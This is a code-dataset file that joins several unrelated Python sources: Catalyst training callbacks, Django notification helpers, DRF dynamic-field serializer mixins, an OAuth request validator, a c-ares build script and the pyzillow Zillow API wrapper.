"bce_no_logits": torch.nn.BCELoss(),
"focal_loss": FocalLoss(logits=False),
"heng_focal_loss": HengFocalLoss(),
}
seg_loss_name = self.criterion_params["seg_loss"].lower()
clf_loss_name = self.criterion_params["clf_loss"].lower()
# re-initializing criterion with kwargs
seg_kwargs = self.criterion_params.get(seg_loss_name)
clf_kwargs = self.criterion_params.get(clf_loss_name)
seg_kwargs = {} if seg_kwargs is None else seg_kwargs
clf_kwargs = {} if clf_kwargs is None else clf_kwargs
seg_loss = loss_dict[seg_loss_name]
clf_loss = loss_dict[clf_loss_name]
seg_loss.__init__(**seg_kwargs), clf_loss.__init__(**clf_kwargs)
criterion_dict = {seg_loss_name: seg_loss,
clf_loss_name: clf_loss}
print(f"Criterion: {criterion_dict}")
return criterion_dict
def get_callbacks(self):
from catalyst.dl.callbacks import CriterionAggregatorCallback, \
CriterionCallback
seg_loss_name = self.criterion_params["seg_loss"].lower()
clf_loss_name = self.criterion_params["clf_loss"].lower()
callbacks_list = [
CriterionCallback(prefix="seg_loss",
input_key="seg_targets",
output_key="seg_logits",
criterion_key=seg_loss_name),
CriterionCallback(prefix="clf_loss",
input_key="clf_targets",
output_key="clf_logits",
criterion_key=clf_loss_name),
CriterionAggregatorCallback(prefix="loss",
loss_keys=\
["seg_loss", "clf_loss"]),
EarlyStoppingCallback(**self.cb_params["earlystop"]),
]
ckpoint_params = self.cb_params["checkpoint_params"]
if ckpoint_params["checkpoint_path"] != None: # hacky way to say no checkpoint callback but eh what the heck
mode = ckpoint_params["mode"].lower()
if mode == "full":
print("Stateful loading...")
ckpoint_p = Path(ckpoint_params["checkpoint_path"])
fname = ckpoint_p.name
# everything in the path besides the base file name
resume_dir = str(ckpoint_p.parents[0])
print(f"Loading {fname} from {resume_dir}. \
\nCheckpoints will also be saved in {resume_dir}.")
# adding the checkpoint callback
callbacks_list = callbacks_list + [CheckpointCallback(resume=fname,
resume_dir=resume_dir),]
elif mode == "model_only":
print("Loading weights into model...")
self.model = load_weights_train(ckpoint_params["checkpoint_path"], self.model)
print(f"Callbacks: {callbacks_list}")
return callbacks_list
def load_weights_train(checkpoint_path, model):
"""
Loads weights from a checkpoint and into training.
Args:
checkpoint_path (str): path to a .pt or .pth checkpoint
model (torch.nn.Module): <-
Returns:
Model with loaded weights and in train() mode
"""
try:
# catalyst weights
state_dict = torch.load(checkpoint_path, map_location="cpu")["model_state_dict"]
except:
# anything else
state_dict = torch.load(checkpoint_path, map_location="cpu")
model.load_state_dict(state_dict, strict=True)
model.train()
return model
| StarcoderdataPython |
103353 | <filename>webmap/utils.py
import requests
from django.conf import settings
from django.forms.models import model_to_dict
import os
from pywebpush import WebPusher
def send_slack_log(title, message):
slack_url = os.getenv('SLACK_URL')
if not slack_url and hasattr(settings, 'SLACK_URL') and settings.SLACK_URL:
slack_url = settings.SLACK_URL
if slack_url:
payload = {"text": message, "username": title}
requests.post(slack_url, json=payload)
def send_push_notification(subscription, payload, ttl):
subscription_data = _process_subscription_info(subscription)
# Check if GCM info is provided in the settings
gcm_key = os.getenv('GCM_KEY')
if not gcm_key and settings.GCM_KEY:
gcm_key = settings.WEBPUSH_SETTINGS.get('GCM_KEY')
req = WebPusher(subscription_data).send(data=payload, ttl=ttl, gcm_key=gcm_key)
return req
def _process_subscription_info(subscription):
subscription_data = model_to_dict(subscription, exclude=["browser", "id"])
endpoint = subscription_data.pop("endpoint")
p256dh = subscription_data.pop("p256dh")
auth = subscription_data.pop("auth")
return {
"endpoint": endpoint,
"keys": {"p256dh": p256dh, "auth": auth}
}
| StarcoderdataPython |
3322886 | <reponame>csdenboer/drf-dynamic-serializers<filename>drf_dynamic_serializers/mixins.py
from collections import defaultdict
from typing import Callable, List, Tuple, Set
from django.utils.functional import cached_property
from rest_framework.serializers import ListSerializer, Serializer
from rest_framework.request import Request
from .conf import DynamicFieldsConfig, settings
from .exceptions import SerializerDoesNotSupportDynamicFields
__all__ = (
"DynamicFieldsPolymorphicSerializerMixin",
"DynamicFieldsSerializerMixin",
"DynamicFieldsViewMixin",
)
class DynamicFieldsPolymorphicSerializerMixin:
"""
Mixin that implements dynamic fields for PolymorphicSerializers (see
https://github.com/apirobot/django-rest-polymorphic).
"""
dynamic_fields = True
_df_config: DynamicFieldsConfig
to_resource_type: Callable
def __init__(self, *args, **kwargs):
# popup df related arguments, so that we will not get unexpected arguments error
self._df_conf = DynamicFieldsConfig(
included_fields=kwargs.pop("included_fields", None),
excluded_fields=kwargs.pop("excluded_fields", None),
required_fields=kwargs.pop("required_fields", None),
non_nullable_fields=kwargs.pop("non_nullable_fields", None),
)
super().__init__(*args, **kwargs)
model_serializer_mapping = self.model_serializer_mapping
self.model_serializer_mapping = {}
self.resource_type_model_mapping = {}
for model, serializer in model_serializer_mapping.items():
resource_type = self.to_resource_type(model)
if callable(serializer):
is_dynamic_fields_serializer = getattr(
serializer, "dynamic_fields", False
)
# pass df config to initialization of serializer
serializer = serializer(
*args,
**(
{**kwargs, **self._df_conf.__dict__}
if is_dynamic_fields_serializer
else kwargs
)
)
serializer.parent = self
self.resource_type_model_mapping[resource_type] = model
self.model_serializer_mapping[model] = serializer
def set_df_config(self, config: DynamicFieldsConfig) -> None:
"""
Set config 'config' as dynamic fields config.
"""
# loop over all serializers in this polymorphic's serializer and set config 'config' as dynamic fields config
for model, serializer in self.model_serializer_mapping.items():
if getattr(serializer, "dynamic_fields", False):
serializer.set_df_config(config)
class DynamicFieldsSerializerMixin:
"""
Mixin that adds the ability to dynamically configure a serializer's fields. Fields can be included and/or excluded
and the 'required' and 'allow_null' properties of fields can be overridden.
"""
dynamic_fields = True
_df_config: DynamicFieldsConfig
def __init__(self, *args, **kwargs):
self._df_conf = DynamicFieldsConfig(
included_fields=kwargs.pop("included_fields", None),
excluded_fields=kwargs.pop("excluded_fields", None),
required_fields=kwargs.pop("required_fields", None),
non_nullable_fields=kwargs.pop("non_nullable_fields", None),
)
super().__init__(*args, **kwargs)
@cached_property
def fields(self) -> dict:
"""
Get fields to serialize given the fields to include and fields to exclude.
"""
fields = super(DynamicFieldsSerializerMixin, self).fields
included_fields_root, included_fields_nested = self._split_levels(
self._df_conf.included_fields or []
)
excluded_fields_root, excluded_fields_nested = self._split_levels(
self._df_conf.excluded_fields or []
)
# if there are fields to clean
if len(included_fields_root) != 0 or len(excluded_fields_root) != 0:
self._clean_fields(
fields,
excluded_fields_root,
included_fields_root,
excluded_fields_nested,
)
# pass included and excluded fields to fields (used by nested serializers).
for name, field in fields.items():
self._set_df_conf_for_field(
field,
DynamicFieldsConfig(
included_fields=included_fields_nested.get(name, None),
excluded_fields=excluded_fields_nested.get(name, None),
),
)
# set dynamic properties, e.g. allow_null and required
self._apply_dynamic_properties_for_field(fields, name)
return fields
def set_df_config(self, config: DynamicFieldsConfig):
"""
Set config 'config' as dynamic fields config.
"""
self._df_conf = config
def _apply_dynamic_properties_for_field(self, fields, field_name) -> None:
"""
Set dynamic properties to field with name 'field_name' in fields 'fields'.
"""
# if we want to overwrite the 'required' property of the fields
if self._df_conf.required_fields is not None:
fields[field_name].required = field_name in self._df_conf.required_fields
# if we want to overwrite the 'allow_null' property of the fields
if self._df_conf.non_nullable_fields is not None:
fields[field_name].allow_null = (
field_name not in self._df_conf.non_nullable_fields
)
def _clean_fields(
self,
fields: dict,
excluded_fields_root: Set[str],
included_fields_root: Set[str],
excluded_fields_nested: dict,
) -> None:
"""
Clean fields 'fields' given excluded fields 'excluded_fields_root', included fields 'included_fields_root' and
nested excluded fields 'excluded_fields_nested'.
"""
to_remove = []
for field_name in fields:
is_included = self._is_field_included(
field_name,
excluded_fields_root,
included_fields_root,
excluded_fields_nested,
)
if not is_included:
# we cannot pop while iterating
to_remove.append(field_name)
for remove_field in to_remove:
fields.pop(remove_field)
@staticmethod
def _is_field_included(
field_name: str,
excluded_fields: Set[str],
included_fields: Set[str],
nested_excluded_fields: dict,
) -> bool:
"""
Check whether field with name 'field_name' should exist (be serialized) given excluded fields
'excluded_fields_root', included fields 'included_fields_root' and nested excluded fields
'excluded_fields_nested'.
"""
# We don't want to prematurely exclude a field, eg "exclude=house.rooms.kitchen" should not exclude the entire
# house or all the rooms, just the kitchen.
if field_name in excluded_fields and field_name not in nested_excluded_fields:
return False
# if included fields are set (filtering is enabled) and field is not in included_fields, then return False
if len(included_fields) > 0 and field_name not in included_fields:
return False
return True
@staticmethod
def _split_levels(fields: List[str]) -> Tuple[set, defaultdict]:
"""
Convert nested fields into current-level fields and next level fields.
"""
first_level_fields = set()
next_level_fields = defaultdict(list)
for e in fields:
if "." in e:
# split on first .
first_level, next_level = e.split(".", 1)
first_level_fields.add(first_level)
next_level_fields[first_level].append(next_level)
else:
first_level_fields.add(e)
return first_level_fields, next_level_fields
@staticmethod
def _set_df_conf_for_field(field, df_config: DynamicFieldsConfig) -> None:
"""
Set included fields 'included_fields' and excluded field 'fields' to field 'field'.
"""
# if field has support for dynamic fields, then set df config
if getattr(field, "dynamic_fields", False):
field.set_df_config(df_config)
elif type(field) == ListSerializer and getattr(
field.child, "dynamic_fields", False
):
field.child.set_df_config(df_config)
class DynamicFieldsViewMixin:
"""
Mixin for view(set)s that adds the ability to dynamically select the fields to include or exclude in a response by
reading the query parameters in the request.
"""
default_included_fields: List[str]
default_excluded_fields: List[str]
request: Request
get_serializer_class: Callable
get_serializer_context: Callable
def get_serializer(self, *args, **kwargs) -> Serializer:
"""
Get serializer given the dynamically excluded and/or included fields.
"""
serializer_class = self.get_serializer_class()
if getattr(serializer_class, "dynamic_fields", False) is False:
raise SerializerDoesNotSupportDynamicFields()
kwargs["context"] = self.get_serializer_context()
if self._is_eligible_for_dynamic_fields():
kwargs["included_fields"] = self._get_included_fields()
kwargs["excluded_fields"] = self._get_excluded_fields()
return serializer_class(*args, **kwargs)
def _get_included_fields(self) -> List[str]:
"""
Get names of the fields to include.
"""
return (
self._parse_query_params_for_field(
settings.DRF_DYNAMIC_SERIALIZERS_QUERY_PARAM_INCLUDED_FIELDS
)
or self._get_default_included_fields()
)
def _get_excluded_fields(self) -> List[str]:
"""
Get names of the fields to exclude.
"""
return (
self._parse_query_params_for_field(
settings.DRF_DYNAMIC_SERIALIZERS_QUERY_PARAM_EXCLUDED_FIELDS
)
or self._get_default_excluded_fields()
)
def _get_default_included_fields(self) -> List[str]:
"""
Get names of the fields to include by default.
"""
return getattr(self, "default_included_fields", None)
def _get_default_excluded_fields(self) -> List[str]:
"""
Get names of the fields to exclude by default.
"""
return getattr(self, "default_excluded_fields", None)
def _is_eligible_for_dynamic_fields(self) -> bool:
"""
Verify whether the request is eligible for dynamic fields. This is the case if all of the following conditions
are fulfilled:
- request method is GET
"""
return self.request is not None and self.request.method == "GET"
def _parse_query_params_for_field(self, field: str) -> List[str]:
"""
Get parsed value of query params for field 'field'.
"""
value = self.request.query_params.get(field)
return value.split(",") if value else None
| StarcoderdataPython |
3358 | <reponame>anobi/django-oauth-api
import base64
import binascii
from datetime import timedelta
from django.contrib.auth import authenticate
from django.utils import timezone
from oauthlib.oauth2 import RequestValidator
from oauth_api.models import get_application_model, AccessToken, AuthorizationCode, RefreshToken, AbstractApplication
from oauth_api.settings import oauth_api_settings
GRANT_TYPE_MAPPING = {
'authorization_code': (AbstractApplication.GRANT_AUTHORIZATION_CODE,),
'password': (AbstractApplication.GRANT_PASSWORD,),
'client_credentials': (AbstractApplication.GRANT_CLIENT_CREDENTIALS,),
'refresh_token': (AbstractApplication.GRANT_AUTHORIZATION_CODE, AbstractApplication.GRANT_PASSWORD,
AbstractApplication.GRANT_CLIENT_CREDENTIALS)
}
class OAuthValidator(RequestValidator):
def _get_application(self, client_id, request):
"""
Load application instance for given client_id and store it in request as 'client' attribute
"""
assert hasattr(request, 'client'), "'client' attribute missing from 'request'"
Application = get_application_model()
try:
request.client = request.client or Application.objects.get(client_id=client_id)
return request.client
except Application.DoesNotExist:
return None
def _get_auth_string(self, request):
auth = request.headers.get('HTTP_AUTHORIZATION', None)
if not auth:
return None
splitted = auth.split(' ', 1)
if len(splitted) != 2:
return None
auth_type, auth_string = splitted
if auth_type != 'Basic':
return None
return auth_string
def _authenticate_client_basic(self, request):
"""
Try authenticating the client using HTTP Basic Authentication method
"""
auth_string = self._get_auth_string(request)
if not auth_string:
return False
try:
encoding = request.encoding or 'utf-8'
except AttributeError:
encoding = 'utf-8'
try:
b64_decoded = base64.b64decode(auth_string)
except (TypeError, binascii.Error):
return False
try:
auth_string_decoded = b64_decoded.decode(encoding)
except UnicodeDecodeError:
return False
client_id, client_secret = auth_string_decoded.split(':', 1)
if self._get_application(client_id, request) is None:
return False
elif request.client.client_secret != client_secret:
return False
else:
return True
def _authenticate_client_body(self, request):
"""
Try authenticating the client using values from request body
"""
try:
client_id = request.client_id
client_secret = request.client_secret
except AttributeError:
return False
if not client_id:
return False
if self._get_application(client_id, request) is None:
return False
elif request.client.client_secret != client_secret:
return False
else:
return True
def client_authentication_required(self, request, *args, **kwargs):
"""
Determine if client authentication is required for current request.
According to the rfc6749, client authentication is required in the following cases:
- Resource Owner Password Credentials Grant, when Client type is Confidential or when
Client was issued client credentials or whenever Client provided client
authentication, see `Section 4.3.2`_.
- Authorization Code Grant, when Client type is Confidential or when Client was issued
client credentials or whenever Client provided client authentication,
see `Section 4.1.3`_.
- Refresh Token Grant, when Client type is Confidential or when Client was issued
client credentials or whenever Client provided client authentication, see
`Section 6`_
:param request: oauthlib.common.Request
:return: True or False
"""
if self._get_auth_string(request):
return True
try:
if request.client_id and request.client_secret:
return True
except AttributeError:
# Client id or secret not provided
pass
self._get_application(request.client_id, request)
if request.client:
return request.client.client_type == AbstractApplication.CLIENT_CONFIDENTIAL
return super(OAuthValidator, self).client_authentication_required(request, *args, **kwargs)
def authenticate_client(self, request, *args, **kwargs):
"""
Try to authenticate the client.
"""
authenticated = self._authenticate_client_basic(request)
if not authenticated:
authenticated = self._authenticate_client_body(request)
return authenticated
def authenticate_client_id(self, client_id, request, *args, **kwargs):
"""
Ensure client_id belong to a non-confidential client.
A non-confidential client is one that is not required to authenticate through other means, such as using HTTP Basic.
"""
if self._get_application(client_id, request) is not None:
return request.client.client_type != AbstractApplication.CLIENT_CONFIDENTIAL
return False
def confirm_redirect_uri(self, client_id, code, redirect_uri, client, *args, **kwargs):
"""
Ensure client is authorized to redirect to the redirect_uri requested.
"""
auth_code = AuthorizationCode.objects.get(application=client, code=code)
return auth_code.redirect_uri_allowed(redirect_uri)
def get_default_redirect_uri(self, client_id, request, *args, **kwargs):
"""
Get the default redirect URI for the client.
"""
return request.client.default_redirect_uri
def get_default_scopes(self, client_id, request, *args, **kwargs):
"""
Get the default scopes for the client.
"""
return list(oauth_api_settings.SCOPES.keys())
def get_original_scopes(self, refresh_token, request, *args, **kwargs):
"""
Get the list of scopes associated with the refresh token.
"""
return request.refresh_token_object.access_token.scope
def invalidate_authorization_code(self, client_id, code, request, *args, **kwargs):
"""
Invalidate an authorization code after use.
"""
auth_code = AuthorizationCode.objects.get(application=request.client, code=code)
auth_code.delete()
def save_authorization_code(self, client_id, code, request, *args, **kwargs):
"""
Persist the authorization_code.
"""
expires = timezone.now() + timedelta(seconds=oauth_api_settings.ACCESS_TOKEN_EXPIRATION)
AuthorizationCode.objects.create(
application=request.client,
user=request.user,
code=code['code'],
expires=expires,
redirect_uri=request.redirect_uri,
scope=' '.join(request.scopes)
)
return request.redirect_uri
def save_bearer_token(self, token, request, *args, **kwargs):
"""
Persist the Bearer token.
"""
if request.refresh_token:
# Revoke Refresh Token (and related Access Token)
try:
RefreshToken.objects.get(token=request.refresh_token).revoke()
except RefreshToken.DoesNotExist:
# Already revoked?
pass
expires = timezone.now() + timedelta(seconds=oauth_api_settings.ACCESS_TOKEN_EXPIRATION)
user = request.user
if request.grant_type == 'client_credentials':
user = None
access_token = AccessToken.objects.create(
user=user,
scope=token['scope'],
expires=expires,
token=token['access_token'],
application=request.client
)
if 'refresh_token' in token:
if oauth_api_settings.REFRESH_TOKEN_EXPIRATION is not None:
expires = timezone.now() + timedelta(seconds=oauth_api_settings.REFRESH_TOKEN_EXPIRATION)
else:
expires = None
RefreshToken.objects.create(
user=request.user,
token=token['refresh_token'],
expires=expires,
application=request.client,
access_token=access_token
)
return request.client.default_redirect_uri
def revoke_token(self, token, token_type_hint, request, *args, **kwargs):
"""
Revoke an access or refresh token.
:param token: The token string.
:param token_type_hint: access_token or refresh_token.
:param request: The HTTP Request (oauthlib.common.Request)
"""
if token_type_hint not in ['access_token', 'refresh_token']:
token_type_hint = None
token_types = {
'access_token': AccessToken,
'refresh_token': RefreshToken,
}
token_type = token_types.get(token_type_hint, AccessToken)
try:
token_type.objects.get(token=token, application=request.client).revoke()
except token_type.DoesNotExist:
# Lookup from all token types except from already looked up type
other_types = (_type for _type in token_types.values() if _type != token_type)
for other_type in other_types:
for token in other_type.objects.filter(token=token, application=request.client):
token.revoke()
def validate_bearer_token(self, token, scopes, request):
"""
Ensure the Bearer token is valid and authorized access to scopes.
"""
if token is None:
return False
try:
access_token = AccessToken.objects.select_related('application', 'user').get(token=token)
if access_token.is_valid(scopes):
request.client = access_token.application
request.user = access_token.user
request.scopes = scopes
# Required when authenticating using OAuth2Authentication
request.access_token = access_token
return True
return False
except AccessToken.DoesNotExist:
return False
def validate_client_id(self, client_id, request, *args, **kwargs):
"""
Check that and Application exists with given client_id.
"""
return self._get_application(client_id, request) is not None
def validate_code(self, client_id, code, client, request, *args, **kwargs):
"""
Ensure the authorization_code is valid and assigned to client.
"""
try:
auth_code = AuthorizationCode.objects.select_related('user').get(application=client, code=code)
if not auth_code.is_expired:
request.scopes = auth_code.scope.split(' ')
request.user = auth_code.user
return True
return False
except AuthorizationCode.DoesNotExist:
return False
def validate_grant_type(self, client_id, grant_type, client, request, *args, **kwargs):
"""
Ensure client is authorized to use the grant_type requested.
"""
assert (grant_type in GRANT_TYPE_MAPPING)
return request.client.authorization_grant_type in GRANT_TYPE_MAPPING[grant_type]
def validate_redirect_uri(self, client_id, redirect_uri, request, *args, **kwargs):
"""
Ensure client is authorized to redirect to the redirect_uri requested.
"""
return request.client.redirect_uri_allowed(redirect_uri)
def validate_refresh_token(self, refresh_token, client, request, *args, **kwargs):
"""
Ensure the Bearer token is valid and authorized access to scopes.
"""
try:
rt = RefreshToken.objects.select_related('user').get(token=refresh_token)
if not rt.is_expired:
request.user = rt.user
request.refresh_token = rt.token
request.refresh_token_object = rt
return rt.application == client
return False
except RefreshToken.DoesNotExist:
return False
def validate_response_type(self, client_id, response_type, client, request, *args, **kwargs):
"""
Ensure client is authorized to use the response_type requested.
Authorization Endpoint Response Types registry is not supported.
See http://tools.ietf.org/html/rfc6749#section-8.4
"""
if response_type == 'code':
return client.authorization_grant_type == AbstractApplication.GRANT_AUTHORIZATION_CODE
elif response_type == 'token':
return client.authorization_grant_type == AbstractApplication.GRANT_IMPLICIT
else:
return False
def validate_scopes(self, client_id, scopes, client, request, *args, **kwargs):
"""
Ensure the client is authorized access to requested scopes.
"""
return set(scopes).issubset(set(oauth_api_settings.SCOPES.keys()))
def validate_user(self, username, password, client, request, *args, **kwargs):
"""
Ensure the username and password is valid.
"""
user = authenticate(username=username, password=password)
if user is not None and user.is_active:
request.user = user
return True
return False
| StarcoderdataPython |
37396 |
import errno
import os
import subprocess
import sys
from distutils import log
from distutils.command.build_ext import build_ext
from distutils.errors import DistutilsError
def exec_process(cmdline, silent=True, catch_enoent=True, input=None, **kwargs):
"""Execute a subprocess and returns the returncode, stdout buffer and stderr buffer.
Optionally prints stdout and stderr while running."""
try:
sub = subprocess.Popen(args=cmdline, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE, **kwargs)
stdout, stderr = sub.communicate(input=input)
if type(stdout) != type(""):
# decode on Python 3
# do nothing on Python 2 (it just doesn't care about encoding anyway)
stdout = stdout.decode(sys.getdefaultencoding(), "replace")
stderr = stderr.decode(sys.getdefaultencoding(), "replace")
returncode = sub.returncode
if not silent:
sys.stdout.write(stdout)
sys.stderr.write(stderr)
except OSError as e:
if e.errno == errno.ENOENT and catch_enoent:
raise DistutilsError('"%s" is not present on this system' % cmdline[0])
else:
raise
if returncode != 0:
raise DistutilsError('Got return value %d while executing "%s", stderr output was:\n%s' % (returncode, " ".join(cmdline), stderr.rstrip("\n")))
return stdout
def exec_make(cmdline, *args, **kwargs):
assert isinstance(cmdline, list)
makes = ["make"]
if "bsd" in sys.platform:
makes.insert(0, "gmake")
for make in makes:
if "bsd" in sys.platform and make == "make":
log.warn("Running plain make on BSD-derived system. It will likely fail. Consider installing GNU make from the ports collection.")
try:
return exec_process([make] + cmdline, *args, catch_enoent=False, **kwargs)
except OSError as e:
if e.errno != errno.ENOENT:
raise
raise DistutilsError('"make" is not present on this system')
class cares_build_ext(build_ext):
cares_dir = os.path.join('deps', 'c-ares')
user_options = build_ext.user_options
user_options.extend([
("cares-clean-compile", None, "Clean c-ares tree before compilation"),
])
boolean_options = build_ext.boolean_options
boolean_options.extend(["cares-clean-compile"])
def initialize_options(self):
build_ext.initialize_options(self)
self.cares_clean_compile = 0
def build_extensions(self):
if self.compiler.compiler_type == 'mingw32':
# Dirty hack to avoid linking with more than one C runtime when using MinGW
self.compiler.dll_libraries = [lib for lib in self.compiler.dll_libraries if not lib.startswith('msvcr')]
self.force = self.cares_clean_compile
if self.compiler.compiler_type == 'msvc':
self.cares_lib = os.path.join(self.cares_dir, 'cares.lib')
else:
self.cares_lib = os.path.join(self.cares_dir, 'libcares.a')
self.build_cares()
# Set compiler options
if self.compiler.compiler_type == 'mingw32':
self.compiler.add_library_dir(self.cares_dir)
self.compiler.add_library('cares')
self.extensions[0].extra_objects = [self.cares_lib]
self.compiler.add_include_dir(os.path.join(self.cares_dir, 'src'))
if sys.platform.startswith('linux'):
self.compiler.add_library('rt')
elif sys.platform == 'win32':
if self.compiler.compiler_type == 'msvc':
self.extensions[0].extra_link_args = ['/NODEFAULTLIB:libcmt']
self.compiler.add_library('advapi32')
self.compiler.add_library('iphlpapi')
self.compiler.add_library('psapi')
self.compiler.add_library('ws2_32')
build_ext.build_extensions(self)
def build_cares(self):
#self.debug_mode = bool(self.debug) or hasattr(sys, 'gettotalrefcount')
win32_msvc = self.compiler.compiler_type == 'msvc'
def build():
cflags = '-fPIC'
env = os.environ.copy()
env['CFLAGS'] = ' '.join(x for x in (cflags, env.get('CFLAGS', None)) if x)
log.info('Building c-ares...')
if win32_msvc:
exec_process('cmd.exe /C vcbuild.bat', cwd=self.cares_dir, env=env, shell=True)
else:
exec_make(['libcares.a'], cwd=self.cares_dir, env=env)
def clean():
if win32_msvc:
exec_process('cmd.exe /C vcbuild.bat clean', cwd=self.cares_dir, shell=True)
else:
exec_make(['clean'], cwd=self.cares_dir)
if self.cares_clean_compile:
clean()
if not os.path.exists(self.cares_lib):
log.info('c-ares needs to be compiled.')
build()
else:
log.info('No need to build c-ares.')
| StarcoderdataPython |
3362407 | <reponame>hanneshapke/pyzillow
import requests
from xml.etree import cElementTree as ElementTree # for zillow API
from .pyzillowerrors import ZillowError, ZillowFail, ZillowNoResults
from . import __version__
class ZillowWrapper(object):
"""This class provides an interface into the Zillow API.
An API key is required to create an instance of this class:
>>> from pyzillow.pyzillow import ZillowWrapper
>>> zillow_data = ZillowWrapper(YOUR_ZILLOW_API_KEY)
To request data from Zillow, you can choose between:
1. The GetDeepSearchResults API endpoint (:class:`pyzillow.pyzillow.GetDeepSearchResults`)
which requires the following arguments:
* A street address (e.g. ``'2114 Bigelow Ave'``)
* A ZIP code or city and state combination (e.g. ``'98109'`` or ``'Seattle, WA'``)
* Optional: Enabling or disabling Zillow Rentzestimate information in
API results (``True``/``False``)
Example:
>>> from pyzillow.pyzillow import ZillowWrapper, GetDeepSearchResults
>>> zillow_data = ZillowWrapper(YOUR_ZILLOW_API_KEY)
>>> deep_search_response = zillow_data.get_deep_search_results(address,
zipcode,
rentzestimate)
>>> result = GetDeepSearchResults(deep_search_response)
2. The GetUpdatedPropertyDetails API endpoint
(:class:`pyzillow.pyzillow.GetUpdatedPropertyDetails`) which requires a
Zillow Property ID (ZPID) as an argument. You can acquire this identifier by
accessing ``.zillow_id`` from a :class:`pyzillow.pyzillow.GetDeepSearchResults`
object. GetUpdatedPropertyDetails data is not available for all valid Zillow IDs.
Example:
>>> from pyzillow.pyzillow import ZillowWrapper, GetUpdatedPropertyDetails
>>> zillow_data = ZillowWrapper(YOUR_ZILLOW_API_KEY)
>>> updated_property_details_response = \
zillow_data.get_updated_property_details(zillow_id)
>>> result = GetUpdatedPropertyDetails(updated_property_details_response)
"""
def __init__(self, api_key: str = None):
"""Constructor method
"""
self.api_key = api_key
def get_deep_search_results(
self, address: str, zipcode: str, rentzestimate: bool = False
):
"""This method provides results from the GetDeepSearchResults API endpoint as an XML object.
:param address: Street address to look up
:type address: str
:param zipcode: ZIP code to look up
:type zipcode: str
:param rentzestimate: Add Rent Zestimate information to result (True/False),
defaults to False
:type rentzestimate: bool, optional
:return: Result from API query
:rtype: xml.etree.ElementTree.Element
"""
url = "http://www.zillow.com/webservice/GetDeepSearchResults.htm"
params = {
"address": address,
"citystatezip": zipcode,
"rentzestimate": str(rentzestimate).lower(),
"zws-id": self.api_key,
}
return self.get_data(url, params)
def get_updated_property_details(self, zpid: str):
"""This method provides results from the GetUpdatedPropertyDetails API endpoint as an XML object.
:param zpid: Zillow Web Service Identifier
:type zpid: str
:return: Result from API query
:rtype: xml.etree.ElementTree.Element
"""
url = "http://www.zillow.com/webservice/GetUpdatedPropertyDetails.htm"
params = {"zpid": zpid, "zws-id": self.api_key}
return self.get_data(url, params)
def get_data(self, url: str, params: dict):
"""This method requests data from the API endpoint specified in the url argument.
It uses parameters from the params argument.
:param url: URL of API endpoint
:type url: str
:param params: Parameters for API query
:type params: dict
:raises ZillowFail: The API endpoint could not be reached or the request
did not return valid XML
:raises ZillowError: The API endpoint responded with an error code
:raises ZillowNoResults: The request did not return any results
:return: Result from API query
:rtype: xml.etree.ElementTree.Element
"""
try:
request = requests.get(
url=url,
params=params,
headers={
"User-Agent": "".join(["pyzillow/", __version__, " (Python)"])
},
)
except (
requests.exceptions.ConnectionError,
requests.exceptions.TooManyRedirects,
requests.exceptions.Timeout,
):
raise ZillowFail
try:
request.raise_for_status()
except requests.exceptions.HTTPError:
raise ZillowFail
try:
response = ElementTree.fromstring(request.text)
except ElementTree.ParseError:
print("Zillow response is not a valid XML ({})".format(params["address"]))
raise ZillowFail
if response.findall("message/code")[0].text != "0":
raise ZillowError(int(str(response.findall("message/code")[0].text)))
else:
if not response.findall("response"):
print("Zillow returned no results for ({})".format(params["address"]))
raise ZillowNoResults
return response
class ZillowResults(object):
"""Base class for :class:`pyzillow.pyzillow.GetDeepSearchResults`
and :class:`pyzillow.pyzillow.GetUpdatedPropertyDetails`.
"""
def __init__(self):
self.attribute_mapping = {}
def get_attr(self, attr):
"""
"""
try:
return self.data.find(self.attribute_mapping[attr]).text
except AttributeError:
return None
def __str__(self):
return self.zillow_id
@property
def area_unit(self):
"""
lotSizeSqFt
"""
return u"SqFt"
@property
def last_sold_price_currency(self):
"""
lastSoldPrice currency
"""
return self.data.find(self.attribute_mapping["last_sold_price"]).attrib[
"currency"
]
class GetDeepSearchResults(ZillowResults):
"""Maps results from the XML data array into attributes of an instance of GetDeepSearchResults.
An instance of ``GetDeepSearchResults`` has the following attributes:
``.bathrooms``
``.bedrooms``
``.city``
``.fips_county``
``.graph_data_link``
``.home_detail_link``
``.home_size``
``.home_type``
``.last_sold_date``
``.last_sold_price``
``.latitude``
``.longitude``
``.map_this_home_link``
``.property_size``
``.rentzestimate_amount``
``.rentzestimate_last_updated``
``.rentzestimate_valuation_range_high``
``.rentzestimate_valuation_range_low``
``.rentzestimate_value_change``
``.state``
``.street``
``.tax_value``
``.tax_year``
``.total_rooms``
``.use_code``
``.year_built``
``.zestimate_amount``
``.zestimate_last_updated``
``.zestimate_percentile``
``.zestimate_valuation_range_high``
``.zestimate_valuation_range_low``
``.zestimate_value_change``
``.zillow_id``
``.zipcode``
"""
attribute_mapping = {
"bathrooms": "result/bathrooms",
"bedrooms": "result/bedrooms",
"city": "result/address/city",
"fips_county": "result/FIPScounty",
"graph_data_link": "result/links/graphsanddata",
"home_detail_link": "result/links/homedetails",
"home_size": "result/finishedSqFt",
"home_type": "result/useCode",
"last_sold_date": "result/lastSoldDate",
"last_sold_price": "result/lastSoldPrice",
"latitude": "result/address/latitude",
"longitude": "result/address/longitude",
"map_this_home_link": "result/links/mapthishome",
"property_size": "result/lotSizeSqFt",
"rentzestimate_amount": "result/rentzestimate/amount",
"rentzestimate_last_updated": "result/rentzestimate/last-updated",
"rentzestimate_valuation_range_high": "result/rentzestimate/valuationRange/high",
"rentzestimate_valuation_range_low": "result/rentzestimate/valuationRange/low",
"rentzestimate_value_change": "result/rentzestimate/valueChange",
"state": "result/address/state",
"street": "result/address/street",
"tax_value": "result/taxAssessment",
"tax_year": "result/taxAssessmentYear",
"total_rooms": "result/totalRooms",
"use_code": "result/useCode",
"year_built": "result/yearBuilt",
"zestimate_amount": "result/zestimate/amount",
"zestimate_last_updated": "result/zestimate/last-updated",
"zestimate_percentile": "result/zestimate/percentile",
"zestimate_valuation_range_high": "result/zestimate/valuationRange/high",
"zestimate_valuation_range_low": "result/zestimate/valuationRange/low",
"zestimate_value_change": "result/zestimate/valueChange",
"zillow_id": "result/zpid",
"zipcode": "result/address/zipcode",
}
def __init__(self, data, *args, **kwargs):
"""Constructor method
"""
self.data = data.findall("response/results")[0]
for attr in self.attribute_mapping.__iter__():
try:
self.__setattr__(attr, self.get_attr(attr))
except AttributeError:
print("AttributeError with {}".format(attr))
@property
def region_name(self):
"""
region name
